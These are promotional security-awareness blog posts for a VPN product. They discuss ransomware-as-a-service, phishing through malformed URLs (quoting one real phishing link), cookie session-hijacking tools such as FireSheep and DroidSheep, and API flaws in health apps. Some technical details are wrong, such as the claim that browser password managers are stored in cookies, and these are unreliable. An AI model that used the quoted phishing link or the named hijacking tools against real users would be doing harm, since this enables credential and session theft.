No longer do hackers need to have extreme levels of technological literacy to start a campaign; instead, they can purchase or rent Malware on the dark web and begin in earnest.

Cybersecurity researchers have confirmed Cuba is the product of MaaS, being based on the Buran ransomware family.

Buran surfaced on a Russian dark web forum in early 2019, named for the Buran-class orbiters developed by the Soviet Space Program.

Buran is sophisticated ransomware known for its high speed and ability to easily bypass defenses and burrow into Windows system directories.

Before the advent of Buran, the MaaS space was dominated by big hitters such as REVil, GrandCrab, and Phobos. Some of these worked on a commission basis, their customers having to pay as much as 40% of their take back to the developers.

Buran started a price war in the scene, offering rates of 15-25% based on the volume of attacks.

Many ransomware clients have used the Buran core. It’s possible that if Cuba Gang continues their efforts throughout the year, they could be its most infamous user.

How You Can Stay Protected Against Ransomware

In the world of Malware-as-a-service where just about anybody can get their hands on deadly digital tools, preparation is key.

2021 has started on ominous footing for the cybersecurity world and arming yourself, or your business with the right defensive tools against threats like ransomware now is the secret to that preparation.

SaferNet was created as a way to defend against the threats of today and those of tomorrow.

Try SaferNet Now

Phishing Attacks Up 6000% As Hackers Turn to Malformed URLs

Post On: 25 February, 2021 By : Jerry

Phishing attacks have long been the bane of consumer households, and in recent years have switched their target to Small and Medium Businesses (SMB). The number of Phishing attacks rose notably at the start of the pandemic when many workers began working-from-home. That increase has been somehow overshadowed by recent developments, as a new report by GreatHorn reveals Phishing attacks are up nearly 6000% since October. The increase is believed to be tied to a variation in attack vector for hackers carrying out phishing; Malformed URLs.

Many SMBs train their employees to look out for phishing practices in suspect emails. One of the most obvious practices is Typosquatting. This is a ubiquitous attack vector used by cybercriminals, where a misspelling will appear on a brand name website in the hopes the victim will fall for it. One example may be having “facebaok.com” instead of “facebook.com.”

Usually, a hacker will ‘sit’ on a domain like this, hoping someone will accidentally access the site. More common, however, is using it within a phishing email. People don’t always closely scrutinize the URL of a received email and often fall for the trick. As mentioned, this practice is reasonably well-known and not as successful as it once was.

The natural evolution of this and the vector that has caused such a staggering increase in phishing attacks is Malformed URLs.

Usually, on a website that has security certification, you will see “https://”, and if the certification is not in place “http://” appears. For a Malformed URL, the prefix will look something like “http:/\”, using a forward-slash followed by a back-flash, instead of two back-flashes.

While it may seem obvious written in this format, there are a couple of reasons why it’s so successful.

How Malformed URL Phishing Emails Trick Victims

With any form of attack via email, the first and arguably largest obstacle the hacker has to circumvent is the email server itself. Many reputable email providers such as Outlook have security features built-in to ensure their users either don’t receive a malicious email or that the emails are placed in spam or junk.

These security features will scan the incoming URL for suspicious elements, and either reject the email entirely or mark it as spam.

Malformed URLs entirely bypass these scans. Email security is only in place to examine the body of the domain rather than the hypertext protocol preceding it. This security follows a list of guidelines called “Known Bad” which checks a series of conditions on an email before deciding how to handle it, and HTTP-checking is omitted.

The second hurdle a hacker must pass is one less-easily defined and much less tangible, and that is the suspicion of the victim and how well they can eye-ball URLs. The human brain is a complex machine, and amongst many of its odd features is the ability to detect things through eyesight that aren’t there or are inaccurate. Our periphery vision can quite easily match to form the same pattern as what’s in our direct line of sight.

This can be seen most clearly in Uniformity Illusions. This concept applies to reading, and in this case reading data, namely a URL. If we quickly parse a URL with our eyes looking for Typospotting, our periphery will rarely spot “http:/\” unless we intentionally look for it.

What The Attacks Look Like

Greathorns’ report states that across the board, SMBs running Microsoft Office 365 were more likely to witness these attacks at a much higher rate than those running other email services.

While many competitors are catching up, Office 365 remains the dominant email provider for SMBs, and so these attacks are widespread.

Greathorn provided an example of one such attack. The URL used was “http:/\brent.johnson.australiasnationalskincheckday.org.au//exr/[email protected]”. This specific phishing attempt impersonates a voicemail service, informing the recipient that they have a voice message. It emulates the appearance and behavior of many email platforms that use cloud-based voicemail services.

Part of the phishing email, with the button linking to the malformed URL which many users would not pick up on

Following the link brings a user to a ‘Office 365’ page, which first contains a reCAPTCHA, a common security feature of legitimate websites, showing the sophistication and subtlety of the attempted attack.

Following this, the user is presented with a high-fidelity replication of an Office-365 login. Their email address will already appear, and they are prompted for a password. Entering the password here will provide hackers with complete login credentials. At this point, the hacker has a free pass; they gain access to the recipient’s email contact lists and other sensitive data, including cloud storage.

The Challenge of Phishing Attacks for SMBs

Phishing as an attack is relative simple to carry out for a cybercriminal. Set up the page, create the email, and start sending it out enmasse to emails. This ease has made phishing become the go-to attack method for targetting SMBs.

At the end of last year, Proofpoint published a report on the state of phishing attacks against SMBs in 2020. The results were troubling, finding that 75% of SMBs faced phishing attacks through the year, and 57% of these attacks were successful.

Many of these were spear phishing and whaling attacks – Specified attacks against managers and C-level executives at a business.

Phishing is without a doubt one of the great threats any SMB must deal with in the world of cybersecurity. Beyond educating employees and performing regular internal security audits, employers should equip themselves with the right tools to combat phishing.

SaferNet is one of these tools, which we engineered with attacks like Phishing in mind.

Try SaferNet Now

Poisoned Cookies: 5 Notable Attack Vectors For Session Hijacking Using Cookies

Post On: 25 February, 2021 By : Jerry

Cookies; a childhood delight for many, a fondness that continued throughout life. When you say the word, you think of one thing – sugary treats. Otherwise, most of us are aware that cookies in the digital world are present but don’t really understand what they do. Most of our interactions with cookies online come from visiting media sites that prompt us to accept cookies. However, cookies and their use online are an important underpinning of the worldwide web, and their functionality has changed throughout the years. Many technologies associated with the internet are used for nefarious purposes, and cookies are no different.

Cookies are tiny files which you generally receive when visiting a website. These are stored on your computer, and hold a small amount of data relevant to you, the user, and the website you’ve visited. This data is usually passwords, usernames, and session tokens. For example, you may have cookies from social media accounts. When you visit the social media webpage again, the website will access the cookies it previously transferred to you. It can identify you at this stage, and tailor the page for you.

This mostly consists of automatic logins and loading social feeds, but it has some other purposes many don’t realize. A shopping cart on any e-commerce website relies on cookies. Google Maps greatly relies on cookies too. Cookies shape our personalized experience of the web.

The cookies that store your passwords are called Permanent Cookies. If you’ve ever used Password Manager on Google Chrome, these are your permanent cookies. It’s generally good practice to delete these periodically.

When you were younger (and maybe even now), you didn’t want anybody stealing from your cookie jar. With online cookies, you should remember that it’s not a great feeling. Stealing from the digital cookie jar has several different names: Cookie poisoning, Cooking hijacking, and mostly commonly Session Hijacking.

Session Hijacking is rampant. Think of every single website you sign into. It is very likely that one or more is vulnerable to session hijacking. A number of years ago, a report stated that 31% of all e-commerce sites were vulnerable to session hijacking, and it’s only gotten worse. So how does it work?

When you log in to a website, the server sets temporary session cookies in your browser. These cookies are in place to ensure the website knows you’re logged in. All that website needs to know that you are really who you claim are those cookies. This is where a Man-In-The-Middle (MITM) can happen. When you connect to the website, a hacker can easily monitor the network to intercept your cookies and copy their session ID. With this ID, the hacker can return to the website and present the server with your cookies, and fool it into thinking that the hacker is you.

When the hacker is in, they can do anything that you’re authorized to do on the website. This includes purchasing items, stealing company information, starting money transfers from your bank account, and stealing information that can be used for identity theft.

For large enterprise systems that use a Single-Sign System, this can be devastating as entire financial records and company documents and details are uncovered in a single attack.

The two most common versions of these attacks involve Session Sniffing and Cross-Site Scripting (XSS).

Session Sniffing occurs when a hacker uses a packet sniffer, which are often legitimate products, and scans all the traffic on the network. Included in this traffic are session cookies. The hacker will have his system set up to target these. Session Sniffing is most common on public-WiFi; coffee shops, airports, universities, city hotspots, etc.

XSS goes for a more complex approach but can often net more victims. XSS has a plethora of functionality outside Session Hijacking, but as a general rule, it occurs when a hacker injects malicious code into a vulnerable website. When a user accesses the website, it runs the code because their device trusts the website, leading to the hacker’s desired payload being executed. In the realm of Session Hijacking, XSS can be used to grab incoming cookies. This way, a popular website that is compromised can gather thousands of session IDs from users logging in.

If any of this sounds complicated to perform, it’s not. In the world of hacking, hackers are often fiercely intelligent individuals who develop malware far more complex than most of the apps we use on a day-to-day basis. Session Hijacking has been called “Hacking-For-Dummies” in the past, and a simple Google or Youtube search will give you a step-by-step guide. There are exceptions to this of course, and some methods are notable complex, which in turn makes them more effective.

Session Hijacking Attacks Using Cookies #5: WordPress XSS Exploits

WordPress evolved from a beginner’s tool for web development to the de-facto name in the industry. While still exceptionally user-friendly, seasoned users of the service have created beautifully written websites using complex methods. Systems with a low barrier to entry but a high skill ceiling are often popular ones, and WordPress is no exception to this.

One of WordPress many popular features is it’s community-created modules, namely themes and plugins.

Themes are created to give a website its look-and-feel. This can be anything to color theme, image placement, blog post listings, and general layout. Themes are the skeletal structure of a WordPress website.

Plugins, on the other hand, are not so easily defined. Plugins can be anything created by the community to augment your website. This could be a contact form, image slider, Google Analytics Aid, Drag-And-Drop page builder, and more. As of 2020, there were 70,000 different plugins available for WordPress.

Community curated systems like these can be amazing, but they’re easily abused, especially when it comes to session hijacking.

OneTone was a popular WordPress theme several years ago but has since been discontinued. It was still used after its development, which made it an attractive target for hackers – Its original developers no longer supported it. A vulnerability within the themes function.php file allowed a hacker to inject malicious code into the website’s core. When the site administrator visited his page, he was redirected to the hackers’ own domain, where his cookies could be read easily. Even when the administrator had cleaned up the infected, the hacker already had his cookies which worked as a backdoor for later unauthorized entries.

A more recent and much more severe attack came last year. Ninja Forms is a popular forms plugin that allows the administrator to add a form to their website. A legacy version of the plugin was breached using XSS attacks. When an administrator used the form, the code was executed, and their cookies were stolen. Like OneTone, this allowed the hacker administrator access into that WordPress account. Additionally, infected websites would redirect users to malicious websites that attempted various attacks if they were unprotected.

Session Hijacking Attacks Using Cookies #4: FaceNiff

FaceNiff was one of the first popular Android based session hijackers that hit the mobile market. Google Play do not allow malicious apps on their store, and so the .apk which forms the application has to be found elsewhere on the internet. It also requires the hacker to have rooted their Android.

When opened, FaceNiff will scan it’s network using Session Sniffing. Initially it only searched for Facebook logins, but the app has branched out to include YouTube, Amazon, and others.

FaceNiff is used on Public WiFi usually. Once it detects Facebook (or other) session IDs, it will immediately do the heavy lifting in terms of ID translations, and will present the hackers with email addresses and passwords used for login.

Apps like FaceNiff are extremely easy to get, and to use. Often when we thinking of hacking on Public WiFi we get a mental image of a man with his hood up hunched over a laptop in a coffee shop. This idea is somewhat dangerous as it conceals the reality. A hacker using FaceNiff is more likely to be an ordinary looking individual, sitting an airport gate on their phone – Just like everybody else.

Session Hijacking Attacks Using Cookies #3: FireSheep

FireSheep was effectively a more accessible version of FaceNiff.

Released in 2011 for Firefox browser, FireSheep would scan its network and display the list of session IDs for Facebook and other websites in the side bar. A FireSheep user could simply click on the ID it would automatically log them into the targets Facebook.

FireSheep was intended to display the Dangers of Public WiFi. This is certainly an educational proof-of-concept; however, a perhaps misguided step from Mozilla (the creators of Firefox) was to allow FireSheep as an extension on the Firefox addon store.

FireSheep required no rooting or no special knowledge, you simply had to use Firefox to run it. It was mass-adopted by would-be hackers and lead to many compromised accounts. Mozilla eventually removed it, but the damage was done.

Session Hijacking Attacks Using Cookies #2: DroidSheep

DroidSheep was developed with the best of intentions. On an industry level, it allows companies to test the security of their network and of their websites. However given it’s ease-of-use, it’s overtaken FaceNiff as the go-to mobile hijacker.

Like FaceNiff, DroidSheep must be downloaded from the developers’ website onto a rooted Android. It is much more user-friendly than its predecessor and allows for much more functionality. It can scan for any cookies relating to any website and so isn’t hindered in options. It also has the functionality to execute a number of Linux commands.

While it is prevalent among hackers, it would be misleading not to mention that DroidSheeps’ developers knew this could be an issue. Alongside DroidSheep, they released DroidSheep Guard, an app that blocks out any sniffing that the main app can do. While DroidSheep Guard is a useful tool, it does not protect the user against other sniffing applications.

Session Hijacking Attacks Using Cookies #1: Pass-The-Cookie

As session hijacking became more popular, methods to defend against it did too. One such method known to most today is 2-Factor-Authentication (2FA).

2FA works by transmitting a temporary password, or key, to a secondary device when you try login. Usually this can be a text to your phone, or a code on an authenticator app such as Google Authenticator. 2FA is a step in the right direction for securing all your accounts that offer the service and should be set up immediately.

The world of cybersecurity is effectively cyber-warfare, and just as the physical world’s warfare is an arms-race, so is cyber-warfare a cyber-arms-race. If 2FA was a leap forward by the ‘good guys’, Pass-The-Cookie is the new armament for hackers in the race for total security, or insecurity depending on your viewpoint.

With Pass-The-Cookie, a hacker will intercept the cookie the target used when logging in with 2FA. The hacker can then poison the cookie, and use it set Authentication as active for a long period of time, allowing them to freely move around within the compromised account.

This was once thought of as not possible, more so very unlikely. But since the start of 2021, there has been a series of attacks using this method. This has prompted the US government to release a report on the issue.

What You Can Do About Session Hijacking and Poison Cookies

Session Hijacking is without a doubt one of the most common forms of cybercrime. Thankfully, protection against it is simple. While no approach will guarantee 100% safety, SaferNet can get you pretty close!

Session Hijacking relies on being able to detect cookie IDs moving in a network. This assumes the network traffic is unencrypted, which is the case for most people. SaferNet uses 256-bit encryption in its advanced VPN, meaning that anyone sniffing the network you’re using could only make out garbled, nonsensical data. This shuts down network sniffing and stops session hijacking before it begins.

Try SaferNet Now

mHealth Breach: 23 Million Users of Mobile Health Apps Exposed to Attacks

Post On: 25 February, 2021 By : Jerry

mHealth (meaning ‘mobile health’) applications once had a niche place in the app ecosystem. mHealth first appeared to control chronic diseases, from diabetes to thyroid issues, maternal care, asthma, and more. mHealth evolved and expanded to include mental health and even holistic approaches like meditation. Pre-2020, perhaps the most significant surge for the mHealth market came from how we integrated fitness and the Internet. Instagram fitness influencers, wearables like Apple’s Smartwatch, and sharing our fitness statistics with friends and teammates – Thanks to mHealth, the pure scientific knowledge of our own fitness metrics are more apparent now more than at any other point in history. mHealth has seen a steady increase in popularity, especially amongst hospitals and caregivers. These apps grew ever more complex with additional functionality. At the higher end of the spectrum grew more personal – Many require personal medical information, medical history, names, address, and even social security numbers. In 2018, it was reported that “73% of hospitals surveyed have developed or were developing mobile strategies to address the communications, collaboration, and computing requirements of clinical professionals and other mobile workers across medical departments, standalone hospitals, and ambulatory environments.”. The World Health Organisation (WHO) said mHealth brought “New horizons for health through mobile technologies.” However, if you weren’t involved in the medical field, didn’t have a chronic illness or other health concerns, you prefer to track your fitness in a more analog sense, you may not have heard much about mHealth. Our approach to health as a whole changed, of course, with the beginning of the COVID-19 outbreak. mHealth stood out as the ideal way to track COVID-19 infections and implement contact tracing, and more than 60 governments implemented COVID-19 mHealth applications for their citizens. If anything becomes popular in our digital society, it will eventually draw cybercriminals and criminal organizations’ gaze. To combat this, best practices are put in place as the first line of defense. However, for mHealth, these practices have not been followed, which has led many mHealth users vulnerable in the face of data breaches and identity theft.

mHealth Vulnerability

In early February 2021, Knight Ink conducted a vulnerability study on the major mHealth apps and found startling results. Alissa Knight, the founder of Knight Ink, attempted to penetrate 30 leading apps under the agreement she would not publicly name the vulnerable ones. It turns out that all 30 had major vulnerabilities. The majority of the vulnerabilities were related to API attacks. An API, or application programming interface, is a module that allows apps and databases to talk to each other and exchange information. Most apps will use several APIs in their architecture. The weaknesses in how the API’s were established within the apps meant that hackers could very quickly intercept Personally Identifiable Information (PII) and Protected Health Information (PHI). Furthermore, nearly 30% of the apps had no code obfuscation mechanisms, meaning criminals could easily reverse-engineer them. Many also lacked security certifications that protect against a wide variety of attacks. 100% of the apps were vulnerable to Broken Object Level Authorization (BOLA) attacks. Functionally what this means is that the authorization to view data hasn’t been applied correctly, and access can be granted to anyone with the knowledge to view anyone’s PII and PHI they’d like. BOLA attacks are the most serious kind of attacks that can be carried out on any application that holds sensitive records. In her report, Knight said, “Simply put, a BOLA vulnerability enables an adversary to substitute the ID of a resource with the ID of another. When the object ID can be directly called in the URI, it opens the endpoint up to ID enumeration that allows an adversary the ability to read objects that don’t belong to them. These exposed references to internal implementation objects can point to anything, whether it’s a file, directory, database record or key.” Having access to patients’ records means that nearly all information is available to a hacker: lab results, x-ray images, blood work, family history, birth dates, Social Security numbers, and more.

Medical Records and Hackers

Medical records have long been high on any hackers list of targets, as they provide a treasure trove of information about thousands of individuals. We often hear of hospitals have data breaches, and this is why. When asked about the going rate for medical information for hackers, Knight stated a Social Security number is $1, and a credit-card number sells for about $110. Still, the real money is in full medical records, at about $1,000 apiece. Full medical records sell for such a price because they can completely set up an organization to carry out identity theft. All PII and PHI are stored within those reports. Though often making headlines for breaches, there is a much greater number of stories about how hackers couldn’t penetrate a hospital’s network. Given that they have such a target on their back, hospitals have some of the best cybersecurity within their buildings available in the industry. For that reason, a vulnerability in mHealth is much more notable. With the advent of COVID, hospitals are showing greater reliance on mHealth. Hackers no longer have to circumvent complex cybersecurity mechanisms but can easily penetrate a series of mHealth apps and steal the same information.

Better CyberSeurity Practices

Knight’s report was recent, and nearly all of the mHealth vendors on the list have been rushing to make security changes. However, this may be too late, and data may already be taken – Hackers don’t always leave a trail of bread crumbs after an information heist. Apps, mHealth or otherwise, nearly always have some vulnerabilities. Humans are flawed creatures, and the apps they write can be imperfect too. These vulnerabilities are usually on a smaller scale, and the vulnerabilities found within mHealth aren’t as much human error as they are human negligence. It is clear the developers of the apps and the management behind them did not follow best practices when it comes to cybersecurity. Certificates missing, foregoing code obfuscation, and leaving API’s open to BOLA attacks are not human errors but instead reflect a lack of planning and consideration. Outside of app development, many best practices are being ignored by individuals in the industry. Many breaches we hear about, especially in small and medium businesses, can be avoided with education, care, and the right tools to ensure protection. We are at a crossroads in cybersecurity in the workplace, and business leaders must take heed and act accordingly. One of tools business leaders can implement is SaferNet. SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.

Try SaferNet Now